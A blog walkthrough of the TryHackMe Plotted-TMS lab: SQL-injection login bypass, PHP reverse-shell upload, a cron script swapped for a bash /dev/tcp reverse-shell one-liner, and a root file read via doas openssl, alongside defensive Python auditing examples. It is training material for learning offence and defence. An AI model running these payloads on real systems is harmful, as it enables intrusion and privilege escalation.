narancs's blog

TryHackMe – Plotted-TMS walkthrough

Introduction

TryHackMe Plotted-TMS logo

In this post I will explain how I completed the Plotted-TMS room on TryHackMe. This is an easy-difficulty room. We can get initial access to the target through a vulnerability in a web application. Then we can escalate our privileges: first get a shell as another non-root user by exploiting a cron job, then get root access using a sudo privilege.

Enumeration

Results of nmap scan:

3 ports are open:

  • SSH is running on the default port, 22.
  • An Apache web server is running on port 80, the default port for HTTP.
  • Port 445: by default this port is reserved for Microsoft Directory Services (Active Directory and SMB file sharing). However, nmap correctly identified that in this case a second Apache server is listening on it.

Both of the websites serve the default Apache page, so there is nothing interesting at first glance. I used gobuster to enumerate files and directories on the websites.

First I scanned for files on the website running on port 80. That is the default port gobuster uses, so we do not need to specify it. The target IP in my case was 10.10.209.35.

    gobuster dir --url http://10.10.209.35/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 32

gobuster was able to discover the following 3 files:

  • id_rsa: the content of the file is base64 encoded text:
    • VHJ1c3QgbWUgaXQgaXMgbm90IHRoaXMgZWFzeS4ubm93IGdldCBiYWNrIHRvIGVudW1lcmF0aW9uIDpE
    • Decoded text:
      • Trust me it is not this easy..now get back to enumeration :D
  • passwd and shadow: these files contained the same base64 encoded text:
    • bm90IHRoaXMgZWFzeSA6RA==
    • Decoded text:
      • not this easy :D

It looked promising but it was just a rabbit hole. Then I enumerated the website running on port 445.

    gobuster dir --url http://10.10.209.35:445/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 32

Only 1 page was found: /management. I opened it in the browser:

It is a web application named Traffic Offense Management System (TOMS). Several exploits are available on Exploit Database for this web app.

Exploitation

While looking through the available exploits, I found the following in exploit 50244:

    post_data = {"username": "admin' or '1'='1'#", "password": ""}

The script used this POST data to exploit an SQL injection vulnerability. I tested it manually at the login page /management/admin/login.php by entering the username:

    admin' or '1'='1'#

I left the password empty; it does not matter. It worked, and I was logged in as Administrator.
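To show why the payload above works and what stops it, here is an added example (not code from the room or from the TOMS application, whose source is not on this page). It builds a constructed in-memory SQLite table, runs a login query assembled by string concatenation next to a parameterised one, and feeds the same payload to both. One assumption is labelled in the code: the room's payload ends in `#`, which is MySQL's line-comment marker, while SQLite only understands `--`, so the constructed payload swaps the marker; the mechanism is otherwise identical.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory SQLite table with one administrator row.
    The password is stored in clear text only to keep the demonstration short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.execute(
        "INSERT INTO users VALUES ('admin', 'S3cret-constructed-sample', 'Administrator')"
    )
    return conn


def build_vulnerable_query(username, password):
    """Query text built by string concatenation: the user's input becomes SQL syntax."""
    return (f"SELECT role FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def vulnerable_login(conn, username, password):
    """Login as it is written in the vulnerable pattern: returns the role or None."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Parameterised query: the driver binds the values, so quotes and comment
    markers inside the input remain data and never reach the SQL parser."""
    row = conn.execute(
        "SELECT role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Assumption: the room's payload uses '#' (MySQL comment); SQLite needs '--' instead.
PAYLOAD = "admin' or '1'='1'-- "


def demo():
    """Run the payload against both login implementations plus a legitimate login."""
    conn = make_db()
    return {
        "vulnerable": vulnerable_login(conn, PAYLOAD, ""),
        "safe": safe_login(conn, PAYLOAD, ""),
        "legitimate": safe_login(conn, "admin", "S3cret-constructed-sample"),
    }


if __name__ == "__main__":
    print(build_vulnerable_query(PAYLOAD, ""))
    print(demo())
</n>```

Printing the assembled query makes the failure visible: after the injected quote the `or '1'='1'` clause is always true and the comment marker discards the password check, so the vulnerable version returns the Administrator row for an empty password while the parameterised version returns nothing for the same input.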

TOMS - Logged in as Administrator

Then I checked the different menu options in the web app and found a way to upload files: clicking the user name in the top right corner and choosing the My Account option leads to a page where an avatar image can be uploaded.

I was able to upload a PHP reverse shell to get initial access on the target.

User flag

After getting a shell as the www-data user, I checked the files in the /var/www/ directory.

    www-data@plotted:/var/www$ ls -l
    total 8
    drwxr-xr-x 4 root     root     4096 Oct 28 09:18 html
    drwxr-xr-x 2 www-data www-data 4096 Oct 28 09:10 scripts
    www-data@plotted:/var/www$

There is an interesting directory named scripts. It contains a file named backup.sh:

    #!/bin/bash
    /usr/bin/rsync -a /var/www/html/management /home/plot_admin/tms_backup
    /bin/chmod -R 770 /home/plot_admin/tms_backup/management

I checked /etc/crontab and found that the script is executed every minute as the plot_admin user. I did not find anything exploitable in the script itself, and it is owned by plot_admin, so we cannot edit the file. However, file creation and deletion are controlled by the permissions of the containing directory, and that directory is owned by the www-data user. That means we can delete the file and re-create it with arbitrary content.
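The weakness is easy to miss in an audit because the script's own ownership looks fine; what matters is who owns the directory it lives in. The following added example (my own code, not from the room) is a small check that reads /etc/crontab-style lines and, for every script run from an absolute path, reports whether a user other than root or the scheduled user could alter or replace it, looking at the parent directory as well as the file. The sample crontab line and the stat results are constructed to match the room's listing; the uid 1001 for plot_admin is an assumption, and uid 33 for www-data is the usual Debian/Ubuntu value. Real systems are audited by passing the default `os.stat` and `pwd` lookups.

```python
import os
import pwd
import stat
from types import SimpleNamespace


def replacement_reasons(script_st, dir_st, cron_uid):
    """Reasons a user other than root or the cron user could change what cron executes.

    Deleting and re-creating a file is governed by the parent directory's owner and
    mode bits, not by the file's own bits, so the directory is examined as carefully
    as the script itself.
    """
    reasons = []
    for label, st in (("script", script_st), ("parent directory", dir_st)):
        if st.st_uid not in (0, cron_uid):
            reasons.append(f"{label} owned by uid {st.st_uid}, not root or cron uid {cron_uid}")
        if st.st_mode & stat.S_IWOTH:
            # a sticky bit (as on /tmp) limits deletion to owners, but still worth a look
            reasons.append(f"{label} is world-writable")
        elif st.st_mode & stat.S_IWGRP and st.st_gid != 0:
            reasons.append(f"{label} is writable by gid {st.st_gid}")
    return reasons


def parse_system_crontab(lines):
    """Yield (user, command) from /etc/crontab-style lines, which carry a user field."""
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:
            continue  # environment assignment such as PATH=...
        if first.startswith("@"):  # @reboot / @daily shorthand: schedule user command
            fields = line.split(None, 2)
            if len(fields) == 3:
                yield fields[1], fields[2]
            continue
        fields = line.split(None, 6)  # m h dom mon dow user command
        if len(fields) == 7:
            yield fields[5], fields[6]


def audit_crontab(lines, uid_of=lambda name: pwd.getpwnam(name).pw_uid, stat_of=os.stat):
    """Map each cron script given by absolute path to the reasons another user could replace it."""
    findings = {}
    for user, command in parse_system_crontab(lines):
        script = command.split()[0]
        if not script.startswith("/"):
            continue  # resolved through PATH; that is a different audit
        try:
            reasons = replacement_reasons(
                stat_of(script), stat_of(os.path.dirname(script)), uid_of(user)
            )
        except (FileNotFoundError, KeyError):
            continue  # missing file or unknown user
        if reasons:
            findings[script] = reasons
    return findings


# Constructed sample modelled on the room's listing: backup.sh owned by plot_admin
# (uid 1001 is an assumption) inside /var/www/scripts, which is owned by www-data
# (uid 33 on Debian/Ubuntu) with mode drwxr-xr-x.
SAMPLE_CRONTAB = [
    "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
    "# m h dom mon dow user  command",
    "* * * * * plot_admin /var/www/scripts/backup.sh",
]
SAMPLE_UIDS = {"plot_admin": 1001, "www-data": 33, "root": 0}


def sample_stats(fixed):
    """Fake os.stat results; with fixed=True the directory is owned by root, not www-data."""
    owner = 0 if fixed else 33
    return {
        "/var/www/scripts/backup.sh": SimpleNamespace(
            st_uid=1001, st_gid=1001, st_mode=stat.S_IFREG | 0o755),
        "/var/www/scripts": SimpleNamespace(
            st_uid=owner, st_gid=owner, st_mode=stat.S_IFDIR | 0o755),
    }


def audit_sample(fixed=False):
    """Run the audit over the constructed sample instead of the live filesystem."""
    stats = sample_stats(fixed)
    return audit_crontab(SAMPLE_CRONTAB, uid_of=SAMPLE_UIDS.__getitem__,
                         stat_of=stats.__getitem__)


if __name__ == "__main__":
    print(audit_sample())      # the room's misconfiguration
    print(audit_sample(True))  # directory owned by root: nothing to report
```

With the directory owned by www-data the audit reports the parent directory, exactly the condition exploited above; once the directory is owned by root (or by plot_admin itself) with mode 755, the same script produces no finding.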

I removed the file and replaced it with a reverse shell script.

    echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<IP_ADDRESS>/9999 0>&1' > backup.sh
    chmod +x backup.sh

I started the listener and within a minute I received a shell as plot_admin user. The user flag was in the home directory.

Root flag

I checked for SUID binaries.

    find / -perm -u=s -type f 2>/dev/null

These were the binaries found, ignoring the files under the /snap/... directories:

    /usr/bin/passwd
    /usr/bin/sudo
    /usr/bin/gpasswd
    /usr/bin/mount
    /usr/bin/su
    /usr/bin/chfn
    /usr/bin/fusermount
    /usr/bin/at
    /usr/bin/chsh
    /usr/bin/umount
    /usr/bin/doas
    /usr/bin/newgrp
    /usr/libexec/polkit-agent-helper-1
    /usr/lib/snapd/snap-confine
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign

The binary that caught my attention is /usr/bin/doas. I had not heard of doas before, so I did some research and found that it is a replacement for the sudo command, developed for OpenBSD. Privileges are defined in the /etc/doas.conf configuration file. I checked this file and it contained one line:

    permit nopass plot_admin as root cmd openssl

This means that the plot_admin user is allowed to execute openssl as root without a password. I checked GTFOBins to see how I could use this to get the root flag. GTFOBins says:

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

I used the following command to read the /root/root.txt file as root, output it as base64-encoded text, and pipe it through a base64 decoder to get the flag.

    doas openssl enc -base64 -in /root/root.txt | base64 -d
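The doas.conf line combines three things a reviewer should flag separately: `nopass` removes authentication, `cmd openssl` without an `args` clause allows any arguments, and openssl run as root can read any file, as the GTFOBins quote above states. Here is an added example (my own code, not from the room or from the doas project) that parses doas.conf rules following the grammar in doas.conf(5), `permit|deny [options] identity [as target] [cmd command [args ...]]`, and reports those three conditions plus a rule with no `as` clause, which doas treats as permitting any target user. The sample configuration is constructed: its second line is the rule from the room, and the hardened fourth line is a hypothetical replacement, not something the room contains.

```python
import os

OPTIONS = {"nopass", "nolog", "persist", "keepenv"}


def parse_doas_rule(line):
    """Parse one rule: permit|deny [options] identity [as target] [cmd command [args ...]].
    Returns None for blank, comment-only, or malformed lines."""
    tokens = line.split()
    if not tokens or tokens[0] not in ("permit", "deny"):
        return None
    rule = {"action": tokens[0], "options": set(), "identity": None,
            "target": None, "cmd": None, "args": None}
    i = 1
    while i < len(tokens) and (tokens[i] in OPTIONS or tokens[i] == "setenv"):
        if tokens[i] == "setenv":  # setenv { VAR VAR=value ... }: skip the brace list
            rule["options"].add("setenv")
            i += 1
            while i < len(tokens) and not tokens[i].endswith("}"):
                i += 1
            i += 1
        else:
            rule["options"].add(tokens[i])
            i += 1
    if i >= len(tokens):
        return None  # no identity: malformed
    rule["identity"] = tokens[i]  # a user name or :group
    i += 1
    if i + 1 < len(tokens) and tokens[i] == "as":
        rule["target"] = tokens[i + 1]
        i += 2
    if i + 1 < len(tokens) and tokens[i] == "cmd":
        rule["cmd"] = tokens[i + 1]
        i += 2
        if i < len(tokens) and tokens[i] == "args":
            rule["args"] = tokens[i + 1:]  # 'args' alone means: no arguments allowed
    return rule


# Commands that keep root privileges and can read arbitrary files when run as root.
# openssl is the one on this page (per GTFOBins); extend the set from your own review.
FILE_READ_COMMANDS = {"openssl"}


def audit_doas_conf(text, risky_commands=FILE_READ_COMMANDS):
    """Return (line number, message) findings for permit rules that grant more than intended."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        rule = parse_doas_rule(raw.split("#", 1)[0])
        if rule is None or rule["action"] != "permit":
            continue
        who = rule["identity"]
        target = rule["target"] or "any user"  # no 'as' clause: doas allows every target
        if "nopass" in rule["options"]:
            findings.append((n, f"{who} may run as {target} without authenticating"))
        if rule["target"] is None:
            findings.append((n, f"{who} rule does not pin a target user"))
        if rule["cmd"] is None:
            findings.append((n, f"{who} may run any command as {target}"))
            continue
        name = os.path.basename(rule["cmd"])
        if rule["args"] is None:
            findings.append((n, f"{who}: {name} allowed with arbitrary arguments"))
        if name in risky_commands:
            findings.append((n, f"{who}: {name} as {target} can read arbitrary files"))
    return findings


# Constructed sample: line 2 is the rule found in the room; line 4 is a hypothetical
# hardened replacement that requires authentication and pins the command and arguments.
SAMPLE_CONF = """\
# constructed doas.conf sample
permit nopass plot_admin as root cmd openssl
# hypothetical hardened rule (not from the room)
permit persist plot_admin as root cmd /usr/bin/rsync args -a /var/www/html/management /home/plot_admin/tms_backup
"""


if __name__ == "__main__":
    for n, msg in audit_doas_conf(SAMPLE_CONF):
        print(f"line {n}: {msg}")
```

Run against the sample, the room's rule yields three findings and the hardened rule none: authentication is required (`persist` caches it briefly instead of disabling it), the command is given by full path, and `args` fixes the arguments so the rule cannot be turned into an arbitrary file read.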

1 Comment

Anonymous
Good walkthrough